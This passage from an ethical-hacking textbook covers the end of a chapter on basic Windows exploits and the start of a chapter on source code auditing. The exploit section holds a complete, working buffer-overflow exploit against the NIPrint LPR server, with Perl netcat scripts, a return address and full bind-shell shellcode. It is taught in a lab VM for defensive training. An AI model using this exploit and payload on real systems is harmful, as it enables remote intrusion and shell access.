0012fd44 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
0012fd54 d9 ee d9 74 24 f4 5b 31-c9 b1 29 81 73 17 4b 98 ...t$.[1..).s.K.
0012fd64 fd 17 83 eb fc e2 f4 b7-70 ab 17 4b 98 ae 42 1d ........p..K..B.
0012fd74 cf 76 7b 6f 80 76 52 77-13 a9 12 33 99 17 9c 01 .v{o.vRw...3....
0012fd84 80 76 4d 6b 99 16 f4 79-d1 76 23 c0 99 13 26 b4 .vMk...y.v#...&.
0012fd94 64 cc d7 e7 a0 1d 63 4c-59 32 1a 4a 5f 16 e5 70 d.....cLY2.J_..p
0012fda4 e4 d9 03 3e 79 76 4d 6f-99 16 71 c0 94 b6 9c 11 ...>yvMo..q.....
0012fdb4 84 fc fc c0 9c 76 16 a3-73 ff 26 8b c7 a3 4a 10 .....v..s.&...J.
Yep, that’s one line of nops and then our shellcode. Let’s continue on to the end of the
function. When it returns, we should jump to our shellcode that launches calc.
0:000> g
Hello Mr. t$s
n [snip]
Breakpoint 1 hit
eax=000001a2 ebx=7ffdf000 ecx=00415b90 edx=00415b90 esi=7ffdebf8 edi=00000018
eip=00401057 esp=0012fed0 ebp=90909090 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
meet!greeting+0x37:
00401057 c3 ret
0:000> p
eax=000001a2 ebx=7ffdf000 ecx=00415b90 edx=00415b90 esi=00080178 edi=00000000
eip=0012fd44 esp=0012fed4 ebp=90909090 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206
0012fd44 90 nop
0:000>
Looks like the beginning of a nop sled!When we continue, up pops calc. If calc did
not pop up for you, a small adjustment to your offset will likely fix the problem. Poke
around in memory until you find the location of your shellcode and point the return
address at that memory location.
Real-World Windows Exploit Example
In this section, we will use OllyDbg and Metasploit to build on the previously learned
Linux exploit development process. We will teach you how to go from a basic vulnerability
advisory to a basic proof of concept exploit.
Exploit Development Process Review
As you recall from the previous chapters, the exploit development process is
• Control eip
• Determine the offset(s)
• Determine the attack vector
• Build the exploit sandwich
• Test the exploit
• Debug the exploit if needed
NIPrint Server
The NIPrint server is a network printer daemon that receives print jobs via the platformindependent
printing protocol called LPR. In 2003, an advisory warned of a buffer overflow
vulnerability that might be triggered by sending more than 60 bytes to port
TCP 515.
At this point we will set up the vulnerable 4.x NIPrint™ server on a VMWare™ guest virtual
machine.We will use VMWare because it allows us to start, stop, and restart our virtual
machine much more quickly than rebooting.
Gray Hat Hacking: The Ethical Hacker’s Handbook
266
Chapter 11: Basic Windows Exploits
267
PART III
CAUTION Since we are running a vulnerable program, the safest way to
conduct testing is to place the virtual Network Interface Card (NIC) of
VMWare™ in “host only” mode. This will ensure that no outside machines
can connect to our vulnerable virtual machine. See VMWare documentation
for more information.
Inside the virtual machine, install and start the NIPrint server from the start menu.
After the program launches, you will need to configure the program as shown to make it
accept network calls.
Now that the printer is running, you need to determine the IP of the vulnerable server
and ping the vulnerable virtual machine from the host machine. In our case, the vulnerable
virtual machine is located at 10.10.10.130.
Next, inside the virtual machine, open OllyDbg and attach it to the vulnerable program
by selecting File | Attach. Select the NIPRINT3 server and click the Attach button to
start the debugger.
Gray Hat Hacking: The Ethical Hacker’s Handbook
268
Once the debugger starts, you will need to press F9 to “continue” the debugger.
At this point (with the debugger running on a vulnerable server), it is suggested that
you save the state of the VMWare™ virtual machine by saving a snapshot. After the snapshot
is complete, you may return to this point by simply reverting the snapshot. This
trick will save you valuable testing time as you may skip all of the previous setup and
reboots on subsequent iterations of testing.
Control eip
Open up the Metasploit shell and create a small Perl script to verify the vulnerability of
the server.
$string = "A" x 60;
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
REMEMBER Change the IP to match your vulnerable server.
When you launch the Perl script, you should see the server crash as the debugger
catches an exception and pauses. The lower-right corner of the debugger will turn yellow
and say “Paused”. It is often useful to place your attack window so you can still view the
lower-right corner of OllyDbg in order to see the debugger pause.
As you can see, we have controlled eip by overwriting it with 0x41414141.
Determine the Offset(s)
Revert to the snapshot of your virtual machine and resend a 60-byte pattern (generated
with Metasploit PatternCreate as described in Chapter 7).
$string =
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5
Ac6Ac7Ac8Ac9Ad0Ad1Ad2A";
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
NOTE The pattern string is a continuous line; formatting on this page caused
a carriage return.
This time, as expected, the debugger catches an exception and the value of eip contains
the value of a portion of the pattern. Also, notice that the stack pointer (esp) contains
a portion of the pattern.
Use the Metasploit patternOffset.pl program to determine the offset of eip and esp.
For illustrative purposes,we have displayed the register section beside the stack section.
In this particular case, we can see that after 49 bytes of the buffer, we overwrite eip
from bytes 50–53. Then, one word later, at byte 54, the rest of the buffer can be found at
the top of the stack after the program crashes. Notice how the patternOffset.pl tool
reports the location before the pattern starts.
Determine the Attack Vector
On Windows systems, the stack resides in the lower memory addresses. This presents a
problem with the Aleph1 attack technique we used in Linux exploits. Unlike the canned
scenario of the meet.exe program, for real-world exploits, we cannot simply overwrite
Chapter 11: Basic Windows Exploits
269
PART III
eip with a return address on the stack. The address will certainly contain a 0x00 at the
beginning and cause us problems aswe pass that NULL byte to the vulnerable program.
On Windows systems, you will have to find another attack vector. You will often find
a portion if not all of your buffer in one of the registers when a Windows program
crashes. As seen in the last section, we control the area of the stack where the program
crashes. All we need to do is place our shellcode beginning at byte 54 and then overwrite
eip with an opcode to “jmp esp” or “call esp” at bytes 50–53.We chose this attack vector
because either of those opcodes will place the value of esp into eip and execute it.
To find the address of that opcode in our binary, we remember that ntdll.dll is
dynamically loaded into our program at runtime.We can look inside that DLL and others
if necessary by searching the Metasploit opcode database at
http://metasploit.com/users/opcode/msfopcode.cgi?wizard=opcode&step=1
We will choose the first one: “call esp” at 0x77f510b0. Remember that for later.
NOTE This attack vector will not always work. You will have to look at
registers and work with what you’ve got. For example, you may have to “jmp
eax” or “jmp esi”.
Before crafting the exploit sandwich, we should determine the amount of buffer
space available in which to place our shellcode. The easiest way to do this is to throw lots
of As at the program and manually inspect the stack after the program crashes. You can
determine the depth of the buffer we control by clicking in the stack section of the
debugger after the crash and scrolling down to the bottom of the current stack frame and
determining where the As end.
$string = "A" x 500;
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);
Gray Hat Hacking: The Ethical Hacker’s Handbook
270
Chapter 11: Basic Windows Exploits
271
PART III
Subtract the value of esp at the time of crash and you will have the total space available
for shellcode. You can tell by the result (440 available space +original 53 bytes is close to
500) that we could have chosen a number larger than 500 to test and still have been successful;
however, 440 is plenty for us and we will proceed to the next stage.
NOTE You will not always have the space you need. Sometimes you only have
5–10 bytes, then some important value may be in the way. Beyond that, you
may have more space. When you encounter a situation like this, use a short
jump such as “EB06”, which will jump 6 bytes forward. You may jump 127 bytes
in either direction using this trampoline technique.
Build the Exploit Sandwich
We are ready to get some shellcode. Fire up the Metasploitweb interface and browse to
http://127.0.0.1:55555/PAYLOADS
or use the online Metasploit payload generator at
http://www.metasploit.com:55555/PAYLOADS
Then select Windows Bind Shell and add Restricted Characters of 0x00, leave LPORT=
4444, and click the Generate Payload button.
Gray Hat Hacking: The Ethical Hacker’s Handbook
272
Your shellcode will be provided in the right-hand window. Copy and paste that
shellcode into a test program, compile it, and test it. You may have to respond to your
firewall if you have one.
Great! We have a working shellcode that binds to port 4444.
Test the Exploit
Finally, we can craft the exploit sandwich.
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
#http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97".
"\xf3\x28\x19\x83\xeb\xfc\xe2\xf4\x6b\x99\xc3\x54\x7f\x0a\xd7\xe6".
"\x68\x93\xa3\x75\xb3\xd7\xa3\x5c\xab\x78\x54\x1c\xef\xf2\xc7\x92".
"\xd8\xeb\xa3\x46\xb7\xf2\xc3\x50\x1c\xc7\xa3\x18\x79\xc2\xe8\x80".
"\x3b\x77\xe8\x6d\x90\x32\xe2\x14\x96\x31\xc3\xed\xac\xa7\x0c\x31".
"\xe2\x16\xa3\x46\xb3\xf2\xc3\x7f\x1c\xff\x63\x92\xc8\xef\x29\xf2".
"\x94\xdf\xa3\x90\xfb\xd7\x34\x78\x54\xc2\xf3\x7d\x1c\xb0\x18\x92".
"\xd7\xff\xa3\x69\x8b\x5e\xa3\x59\x9f\xad\x40\x97\xd9\xfd\xc4\x49".
"\x68\x25\x4e\x4a\xf1\x9b\x1b\x2b\xff\x84\x5b\x2b\xc8\xa7\xd7\xc9".
"\xff\x38\xc5\xe5\xac\xa3\xd7\xcf\xc8\x7a\xcd\x7f\x16\x1e\x20\x1b".
"\xc2\x99\x2a\xe6\x47\x9b\xf1\x10\x62\x5e\x7f\xe6\x41\xa0\x7b\x4a".
"\xc4\xa0\x6b\x4a\xd4\xa0\xd7\xc9\xf1\x9b\x39\x45\xf1\xa0\xa1\xf8".
"\x02\x9b\x8c\x03\xe7\x34\x7f\xe6\x41\x99\x38\x48\xc2\x0c\xf8\x71".
"\x33\x5e\x06\xf0\xc0\x0c\xfe\x4a\xc2\x0c\xf8\x71\x72\xba\xae\x50".
"\xc0\x0c\xfe\x49\xc3\xa7\x7d\xe6\x47\x60\x40\xfe\xee\x35\x51\x4e".
"\x68\x25\x7d\xe6\x47\x95\x42\x7d\xf1\x9b\x4b\x74\x1e\x16\x42\x49".
"\xce\xda\xe4\x90\x70\x99\x6c\x90\x75\xc2\xe8\xea\x3d\x0d\x6a\x34".
"\x69\xb1\x04\x8a\x1a\x89\x10\xb2\x3c\x58\x40\x6b\x69\x40\x3e\xe6".
"\xe2\xb7\xd7\xcf\xcc\xa4\x7a\x48\xc6\xa2\x42\x18\xc6\xa2\x7d\x48".
"\x68\x23\x40\xb4\x4e\xf6\xe6\x4a\x68\x25\x42\xe6\x68\xc4\xd7\xc9".
"\x1c\xa4\xd4\x9a\x53\x97\xd7\xcf\xc5\x0c\xf8\x71\x67\x79\x2c\x46".
"\xc4\x0c\xfe\xe6\x47\xf3\x28\x19";
# sub esp, 4097 + inc esp makes stack happy by making
# space for decoding, often used on windows exploits
$prepend = "\x81\xc4\xff\xef\xff\xff\x44";
$string = "A" x 49;
$string .= "\xb0\x10\xf5\x77"; # the address of the call esp
Chapter 11: Basic Windows Exploits
273
PART III
$string .=$prepend."\xcc".$shellcode;
open(NC, "|nc.exe 10.10.10.130 515");
print NC $string;
close(NC);Note: the use of the $prepend variable is a neat trick used for
windows shellcode to make room on the stack for the decoder to properly
decode the shellcode without tromping on the payload (which happens from time
to time). You will often find this on metasploit windows exploits. Add this
trick to your exploit toolkit.
Debug the Exploit if Needed
It’s time to reset the virtual system and launch the preceding script. You should see the
debugger pause because of the \xcc. After you press F9 to continue, you may see the program
crash.
If your program crashes, chances are you have a bad character in your shellcode. This
happens from time to time as the vulnerable program may react to certain characters
and may cause your exploit to abort or be otherwise modified.
To find the bad character, you will need to look at the memory dump of the debugger
and match that memory dump with the actual shellcode you sent across the network. To
set up this inspection, you will need to revert the virtual system and resend the attack
script. This time, step through the program until the shellcode is executed (just after
returning from the greeting function). You may also just press F9 and let the program
pause at the “\xcc”. At that point, right-click on the eip register and select Follow in
Dump to view a hex memory dump of the shellcode. The easiest way to do this would be
to pull up your shellcode in a text window and reformat it by placing 8 bytes per line.
Then you can lay that text windowalongside the debugger and visually inspect for differences
between what you sent and what resides in memory.
Gray Hat Hacking: The Ethical Hacker’s Handbook
274
As you can see, in this case the byte just after “0x7F”, the “0x0a” byte, was translated to
“0x00” and probably caused the rest of the damage. To test this theory, regenerate
shellcode and designate the “0x0a” byte as a badchar.
Modify the attack script and repeat the debugging process until the exploit successfully
completes and you can connect to a shell on port 4444.
NOTE You may have to repeat this process of looking for bad characters
many times until your code executes properly. In general, you will want to
exclude all white space chars: 0x00, 0x20, 0x0a, 0x0d, 0x1b, 0x0b, 0x0c.
When this works successfully in the debugger, you may remove the “\xcc” from your
shellcode (best to just replace it with a “\x90” to keep the current alignment) and try again.
When everythingworks right, youmay close the debugger and restart the service to try again.
Success!We have demonstrated the Windows exploit development process on a realworld
exploit.
Vulnerability Analysis
■ Chapter 12 Passive Analysis
■ Chapter 13 Advanced Static Analysis with IDA
■ Chapter 14 Advanced Reverse Engineering
■ Chapter 15 Client Side Browser Exploits
■ Chapter 16 Abusing Weak ACLs for Local EoP
■ Chapter 17 Intelligent Fuzzing with Sulley
■ Chapter 18 From Vulnerability to Exploit
■ Chapter 19 Closing the Holes: Mitigation
275
This page intentionally left blank
277
CHAPTER12 Passive Analysis
• Why reverse engineering is a useful skill
• Reverse engineering considerations
• Source code auditing tools
• The utility of source code auditing tools
• Manual source code auditing
• Manual auditing of binaries
• Automated binary analysis tools
What is reverse engineering? At the highest level it is simply taking a product apart to
understand how it works. You might do this for many reasons, among them:
• Understanding the capabilities of the product’s manufacturer
• Understanding the functions of the product in order to create compatible
components
• Determining whether vulnerabilities exist in a product
• Determining whether an application contains any undocumented functionality
Many different tools and techniques have been developed for reverse engineering
software. We focus here on those tools and techniques that are most helpful in revealing
flaws in software. This chapter discusses “static,” also called passive, reverse engineering
techniques in which you will attempt to discover vulnerabilities simply by
examining source or compiled code in order to discover potential flaws. In following
chapters, we will discuss more active means of locating software problems and how to
determine whether those problems can be exploited.
Ethical Reverse Engineering
Where does reverse engineering fit in for the ethical hacker? Reverse engineering is often
viewed as the craft of the cracker who uses her skills to remove copy protection from
software or media. As a result, you might be hesitant to undertake any reverse engineering
effort. The Digital Millennium Copyright Act (DMCA) is often brought up whenever
reverse engineering of software is discussed. In fact, reverse engineering is addressed
specifically in the anti-circumvention provisions of the DMCA (section 1201(f)). We
will not debate the merits of the DMCA here, but will note that there continue to be
instances in which it is wielded to prevent publication of security-related information
obtained through the reverse engineering process (see the following “References” section).
It is worth remembering that exploiting a buffer overflow in a network server is a
bit different than cracking a Digital Rights Management (DRM) scheme protecting an
MP3 file. You can reasonably argue that the first situation steers clear of the DMCA while
the second lands right in the middle of it. When dealing with copyrighted works,
remember there are two sections of the DMCA that are of primary concern to the ethical
hacker, sections 1201(f) and 1201(j). Section 1201(f) addresses reverse engineering in
the context of learning howto interoperate with existing software, which is not what you
are after in a typical vulnerability assessment. Section 1201(j) addresses security testing
and relates more closely to the ethical hacker’s mission in that it becomes relevant when
you are reverse engineering an access control mechanism. The essential point is that you
are allowed to conduct such research as long as you have the permission of the owner of
the subject system and you are acting in good faith to discover and secure potential vulnerabilities.
Refer to Chapter 2 for a more detailed discussion of the DMCA.
References
Digital Millennium Copyright Act http://thomas.loc.gov/cgi-bin/query/z?c105:H.R.2281.ENR:
DMCA Related Cases www.eff.org/IP/DMCA/
Why Reverse Engineering?
With all of the other techniques covered in this book, why would you ever want to resort
to something as tedious as reverse engineering? You should be interested in reverse engineering
if you want to extend your vulnerability assessment skills beyond the use of the
pen tester’s standard bag of tricks. It doesn’t take a rocket scientist to run Nessus and
report its output. Unfortunately, such tools can only report on what they know. They
can’t report on undiscovered vulnerabilities and that is where your skills as a reverse
engineer come into play. If you want to move beyond the standard features of Canvas or
Metasploit and learn how to extend them effectively, you will probably want to develop
at least some rudimentary reverse engineering skills. Vulnerability researchers use a variety
of reverse engineering techniques to find new vulnerabilities in existing software.
Youmay be content to wait for the security community at large to discover and publicize
vulnerabilities for the more common software components that your pen-test client
happens to use. But who is doing the work to discover problems with the custom, webenabled
payroll application that Joe Coder in the accounting department developed
and deployed to save the company money? Possessing some reverse engineering skills
will pay big dividends whether you want to conduct a more detailed analysis of popular
software, or whether you encounter those custom applications that some organizations
insist on running.
Gray Hat Hacking: The Ethical Hacker’s Handbook
278
Chapter 12: Passive Analysis
279
PART IV
Reverse Engineering Considerations
Vulnerabilities exist in software for any number of reasons. Some people would say that
they all stem from programmer incompetence. While there are those who have never
seen a compiler error, let he who has never dereferenced a null pointer cast the first
stone. In actuality, the reasons are far more varied and may include
• Failure to check for error conditions
• Poor understanding of function behaviors
• Poorly designed protocols
• Improper testing for boundary conditions
CAUTION Uninitialized pointers contain unknown data. Null pointers have
been initialized to point to nothing so that they are in a known state. In C/
C++ programs, attempting to access data (dereferencing) through either
usually causes a program to crash or at minimum, unpredictable behavior.
As long as you can examine a piece of software, you can look for problems such as
those just listed. How easy it will be to find those problems depends on a number of factors.
Do you have access to the source code for the software? If so, the job of finding vulnerabilities
may be easier because source code is far easier to read than compiled code.
How much source code is there? Complex software consisting of thousands (perhaps
tens of thousands) of lines of code will require significantly more time to analyze than
smaller, simpler pieces of software. What tools are available to help you automate some
or all of this source code analysis? What is your level of expertise in a given programming
language? Are you familiar with common problem areas for a given language?
What happens when source code is not available and you only have access to a compiled
binary? Do you have tools to help you make sense of the executable file? Tools such as
disassemblers and decompilers can drastically reduce the amount of time it takes to
audit a binary file. In the remainder of this chapter, we will answer all of these questions
and attempt to familiarize you with some of the reverse engineer’s tools of the trade.
Source Code Analysis
If you are fortunate enough to have access to an application’s source code, the job of
reverse engineering the application will be much easier. Make no mistake, it will still be
a long and laborious process to understand exactly how the application accomplishes
each of its tasks, but it should be easier than tackling the corresponding application
binary. A number of tools exist that attempt to automatically scan source code for
known poor programming practices. These can be particularly useful for larger applications.
Just remember that automated tools tend to catch common cases and provide no
guarantee that an application is secure.
Gray Hat Hacking: The Ethical Hacker’s Handbook
280
Source Code Auditing Tools
Many source code auditing tools are freely available on the Internet. Some of the more
common ones include ITS4, RATS, FlawFinder, and Splint. Microsoft now offers its
PREfast tool as part of its Visual Studio 2005 Team Edition, or with the freely downloadable
Windows 2003 Driver Development Kit (DDK). On the commercial side, several
vendors offer dedicated source code auditing tools that integrate into several common
development environments such as Eclipse and Visual Studio. The commercial tools
range in price from several thousand dollars to tens of thousands of dollars.
ITS4, RATS, and FlawFinder all operate in a fairly similar manner. Each one consults a
database of poor programming practices and lists all of the danger areas found in
scanned programs. In addition to known insecure functions, RATS and FlawFinder
report on the use of stack allocated buffers and cryptographic functions known to incorporate
poor randomness. RATS alone has the added capability that it can scan Perl, PHP,
and Python code, as well as C code.
For demonstration purposes, we will take a look at a file named find.c, which implements
a UDP-based remote file location service.We will take a closer look at the source
code for find.c later. For the time being, let’s start off by running find.c through RATS.
Here we ask RATS to list input functions, output only default and high-severity warnings,
and use a vulnerability database named rats-c.xml.
# ./rats -i -w 1 -d rats-c.xml find.c
Entries in c database: 310
Analyzing find.c
find.c:46: High: vfprintf
Check to be sure that the non-constant format string passed as argument 2 to
this function call does not come from an untrusted source that could have
added formatting characters that the code is not prepared to handle.
find.c:119: High: fixed size local buffer
find.c:164: High: fixed size local buffer
find.c:165: High: fixed size local buffer
find.c:166: High: fixed size local buffer
find.c:167: High: fixed size local buffer
find.c:172: High: fixed size local buffer
find.c:179: High: fixed size local buffer
find.c:547: High: fixed size local buffer
Extra care should be taken to ensure that character arrays that are allocated
on the stack are used safely. They are prime targets for buffer overflow
attacks.
find.c:122: High: sprintf
find.c:513: High: sprintf
Check to be sure that the format string passed as argument 2 to this function
call does not come from an untrusted source that could have added formatting
characters that the code is not prepared to handle. Additionally, the format
string could contain '%s' without precision that could result in a buffer
overflow.
find.c:524: High: system
Argument 1 to this function call should be checked to ensure that it does not
come from an untrusted source without first verifying that it contains
nothing dangerous.
find.c: 610: recvfrom
Double check to be sure that all input accepted from an external data source
does not exceed the limits of the variable being used to hold it. Also make
sure that the input cannot be used in such a manner as to alter your
program's
behavior in an undesirable way.
Total lines analyzed: 638
Total time 0.000859 seconds
742724 lines per second
We are informed of a number of stack allocated buffers, and pointed to a couple of
function calls for further, manual investigation. It is generally easier to fix these problems
than it is to determine if they are exploitable and under what circumstances. For
find.c, it turns out that exploitable vulnerabilities exist at both sprintf() calls, and the
buffer declared at line 172 can be overflowed with a properly formatted input packet.
However, there is no guarantee that all potentially exploitable code will be located by
such tools. For larger programs, the number of false positives increases and the usefulness
of the tool for locating vulnerabilities decreases. It is left to the tenacity of the auditor
to run down all of the potential problems.
Splint is a derivative of the C semantic checker Lint, and as such generates significantly
more information than any of the other tools. Splint will point out many types of programming
problems, such as use of uninitialized variables, type mismatches, potential memory
leaks, use of typically insecure functions, and failure to check function return values.
CAUTION Many programming languages allow the programmer to ignore the
values returned by functions. This is a dangerous practice as function return values
are often used to indicate error conditions. Assuming that all functions complete
successfully is another common programming problem that leads to crashes.
In scanning for security-related problems, the major difference between Splint and
the other free tools is that Splint recognizes specially formatted comments embedded in
the source files that it scans. Programmers can use Splint comments to convey information
to Splint concerning things such as pre- and postconditions for function calls.
While these comments are not required for Splint to perform an analysis, their presence
can improve the accuracy of Splint’s checks. Splint recognizes a large number of command-
line options that can turn off the output of various classes of errors. If you are
interested in strictly security-related issues, you may need to use several options to cut
down on the size of Splint’s output.
Microsoft’s PREfast tool has the advantage of very tight integration within the Visual
Studio suite. Enabling the use of PREfast for all software builds is a simple matter of
enabling code analysis within your Visual Studio properties. With code analysis enabled,
source code is analyzed automatically each time you attempt to build it, andwarnings and
recommendations are reported inline with any other build-related messages. Typical messages
report the existence of a problem, and in some cases make recommendations for fixing
each problem. Like Splint, PREfast supports an annotation capability that allows
Chapter 12: Passive Analysis
281
PART IV
Gray Hat Hacking: The Ethical Hacker’s Handbook
282
programmers to request more detailed checks from PREfast through the specification of
pre- and postconditions for functions.
NOTE Preconditions are a set of one or more conditions that must be true
upon entry into a particular portion of a program. Typical preconditions might
include the fact that a pointer must not be NULL, or that an integer value
must be greater than zero. Postconditions are a set of conditions that must hold
upon exit from a particular section of a program. These often include statements regarding
expected return values and the conditions under which each value might occur.
One of the drawbacks to using PREfast is that it may require substantial effort to use
with projects that have been created on Unix-based platforms, effectively eliminating it
as a scanning tool for such projects.
The Utility of Source Code Auditing Tools
It is clear that source code auditing tools can focus developers’ eyes on problem areas in
their code, but how useful are they for an ethical hacker? The same output is available to
both the white hat and the black hat hacker, so howis each likely to use the information?
The White Hat Point of View
The goal of a white hat reviewing the output of a source code auditing tool should be to
make the software more secure. If we trust that these tools accurately point to problem
code, it will be in the white hat’s best interest to spend her time correcting the problems
noted by these tools. It requires far less time to convert a strcpy() to a strncpy() than it
does to backtrack through the code to determine if that same strcpy() is exploitable. The
use of strcpy() and similar functions do not by themselves make a program exploitable.
NOTE The strcpy() function is dangerous because it copies data into a
destination buffer without any regard for the size of the buffer and therefore
may overflow the buffer. One of the inputs to the strncpy() function is the
maximum number of characters to be copied into the destination buffer.
Programmers who understand the details of strcpy() will often conduct testing to
validate any parameters that will be passed to such functions. Programmers who do not
understand the details of these exploitable functions often make assumptions about the
format or structure of input data. While changing strcpy() to strncpy() may prevent a
buffer overflow, it also has the potential to truncate data, which may have other consequences
later in the application.
CAUTION The strncpy() function can still prove dangerous. Nothing
prevents the caller from passing an incorrect length for the destination buffer,
and under certain circumstances, the destination string may not be properly
terminated with a null character.
Chapter 12: Passive Analysis
283
PART IV
It is important to make sure that proper validation of input data is taking place. This
is the time-consuming part of responding to the alerts generated by source auditing
tools.Having spent the time to secure the code, you have little need to spend much more
time determining if the original code was actually vulnerable or not, unless you are trying
to prove a point. Remember, however, that receiving a clean bill of health from a
source code auditing tool by no means implies that the program is bulletproof. The only
hope of completely securing a program is through the use of secure programming practices
from the outset and through periodic manual review by programmers familiar with
how the code is supposed to function.
NOTE For all but the most trivial of programs, it is virtually impossible to
formally prove that a program is secure.
The Black Hat Point of View
The black hat is by definition interested in finding out how to exploit a program. For the
black hat, output of source auditing tools can serve as a jumping-off point for finding
vulnerabilities. The black hat has little reason to spend time fixing the code because this
defeats his purpose. The level of effort required to determine whether a potential trouble
spot is vulnerable is generally much higher than the level of effort the white hat will
expend fixing that same trouble spot. And, as with the white hat, the auditing tool’s output
is by no means definitive. It is entirely possible to find vulnerabilities in areas of a
program not flagged during the automated source audit.
The Gray Hat Point of View
So where does the gray hat fit in here? It is often not the gray hat’s job to fix the source code
she audits. She should certainly present her finding to the maintainers of the software, but
there is no guarantee that they will act on the information, especially if they do not have
the time, or worse, refuse to seriously consider the information that they are being furnished.
In cases where the maintainers refuse to address problems noted in a source code
audit, whether automated or manual, it may be necessary to provide a proof-of-concept
demonstration of the vulnerability of the program. In these cases, it is useful for the gray
hat to understand how to make use of the audit results for locating actual vulnerabilities
and developing proof-of-concept code to demonstrate the seriousness of these vulnerabilities.
Finally, it may fall on the auditor to assist in developing a strategy for mitigating the
vulnerability in the absence of a vendor fix, as well as to develop tools for automatically
locating all vulnerable instances of an application within an organization’s network.
Manual Source Code Auditing
What can you do when an application is programmed in a language that is not supported
by an automated scanner? How can you verify all the areas of a program that the
automated scanners may have missed? How do you analyze programming constructs
that are too complex for automated analysis tools to follow? In these cases, manual
auditing of the source code may be your only option. Your primary focus should be on
the ways in which user-supplied data is handled within the application. Since most vulnerabilities
are exploited when programs fail to properly handle user input, it is important
to first understand how data is passed to an application, and second, to understand
what happens with that data.
Sources of User-Supplied Data
The following list contains just a few of the ways in which an application can receive user
input and some of the C functions used to obtain that input. (This list by no means represents
all possible input mechanisms or combinations.)
• Command-line parameters argv manipulation
• Environment variables getenv()
• Input data files read(), fscanf(), getc(), fgetc(), fgets(), vfscanf()
• Keyboard input/stdin read(), scanf(), getchar(), gets()
• Network data read(), recv(), recvfrom()
It is important to understand that in C, any of the file-related functions can be used to
read data from any file, including the standard C input file stdin. Also, since Unix systems
treat network sockets as file descriptors, it is not uncommon to see file input functions
(rather than the network-oriented functions) used to read network data. Finally, it
is entirely possible to create duplicate copies of file/socket socket descriptors using the
dup() or dup2() function.
NOTE In C/C++ programs, file descriptors 0, 1, and 2 correspond to the
standard input (stdin), standard output (stdout), and standard error (stderr)
devices. The dup2() function can be used to make stdin become a copy of any
other file descriptor, including network sockets. Once this has been done, a
program no longer accepts keyboard input; instead, input is taken directly from the network
socket.
If this has been done, you might observe getchar() or gets() being used to read
incoming network data. Several of the source code scanners take command-line options
that will cause them to list all functions (such as those noted previously) in the program
that take external input. Running ITS4 in this fashion against find.c yields the following:
# ./its4 -m -v vulns.i4d find.c
find.c:482: read
find.c:526: read
Be careful not to introduce a buffer overflow when using in a loop.
Make sure to check your buffer boundaries.
----------------
find.c:610: recvfrom
Check to make sure malicious input can have no ill effect.
Carefully check all inputs.
----------------
Gray Hat Hacking: The Ethical Hacker’s Handbook
284
To locate vulnerabilities, you will need to determine which types of input, if any, result
in user-supplied data being manipulated in an insecure fashion. First, you will need to
identify the locations at which the program accepts data. Second, you will need to determine
if there is an execution path that will pass the user data to a vulnerable portion of
code. In tracing through these execution paths, you need to note the conditions that are
required in order to influence the path of execution in the direction of the vulnerable
code. In many cases, these paths are based on conditional tests performed against the user
data. To have any hope of the data reaching the vulnerable code, the data will need to be
formatted in such a way that it successfully passes all conditional tests between the input
point and the vulnerable code. In a simple example, a web server might be found to be
vulnerable when a get request is performed for a particular URL, while a post request for
the same URL is not vulnerable. This can easily happen if get requests are farmed out to
one section of code (that contains a vulnerability) and post requests are handled by a different
section of code that may be secure. More complex cases might result from a vulnerability
in the processing of data contained deep within a remote procedure call (RPC)
parameter that may never reach a vulnerable area on a server unless the data is packaged in
what appears, from all respects, to be a valid RPC request.
Common Problems Leading to Exploitable Conditions
Do not restrict your auditing efforts to searches for calls to functions known to present
problems. A significant number of vulnerabilities exist independently of the presence of
any such calls. Many buffer copy operations are performed in programmer-generated
loops specific to a given application, as the programmers wish to perform their own error
checking or input filtering, or the buffers being copied do not fit neatly into the molds of
some standard API functions. Some of the behaviors that auditors should look for include
• Does the program make assumptions about the length of user-supplied data?
What happens when the user violates these assumptions?
• Does the program accept length values from the user? What size data (1, 2, 4
bytes, etc.) does the program use to store these lengths? Does the program use
signed or unsigned values to store these length values? Does the program check
for the possible overflow conditions when utilizing these lengths?
• Does the program make assumptions about the content/format of usersupplied
data? Does the program attempt to identify the end of various user
fields based on content rather than length of the fields?
• How does the program handle situations in which the user has provided more
data than the program expects? Does the program truncate the input data and if
so, is the data properly truncated? Some functions that perform string copying
are not guaranteed to properly terminate the copied string in all cases. One
such example is strncat. In these cases, subsequent copy operations may result
in more data being copied than the program can handle.
Chapter 12: Passive Analysis
285
PART IV
• When handling C style strings, is the program careful to ensure that buffers
have sufficient capacity to handle all characters including the null termination
character?
• For all array/pointer operations, are there clear checks that prevent access
beyond the end of an array?
• Does the program check return values from all functions that provide them?
Failure to do so is a common problem when using values returned from
memory allocation functions such as malloc, calloc, realloc, and new.
• Does the program properly initialize all variables that might be read before they
are written? If not, in the case of local function variables, is it possible to
perform a sequence of function calls that effectively initializes a variable with
user-supplied data?
• Does the program make use of function or jump pointers? If so, do these reside
in writable program memory?
• Does the program pass user-supplied strings to any function that might in turn
use those strings as format strings? It is not always obvious that a string may be
used as a format string. Some formatted output operations can be buried deep
within library calls and are therefore not apparent at first glance. In the past, this
has been the case in many logging functions created by application programmers.
Example Using find.c
Using find.c as an example, how would this process work? We need to start with user
data entering the program. As seen in the preceding ITS4 output, there is a recvfrom()
function call that accepts an incoming UDP packet. The code surrounding the call looks
like this:
char buf[65536]; //buffer to receive incoming udp packet
int sock, pid; //socket descriptor and process id
sockaddr_in fsin; //internet socket address information
//...
//Code to take care of the socket setup
//...
while (1) { //loop forever
unsigned int alen = sizeof(fsin);
//now read the next incoming UDP packet
if (recvfrom(sock, buf, sizeof(buf), 0,
(struct sockaddr *)&fsin, &alen) < 0) {
//exit the program if an error occurred
errexit("recvfrom: %s\n", strerror(errno));
}
pid = fork(); //fork a child to process the packet
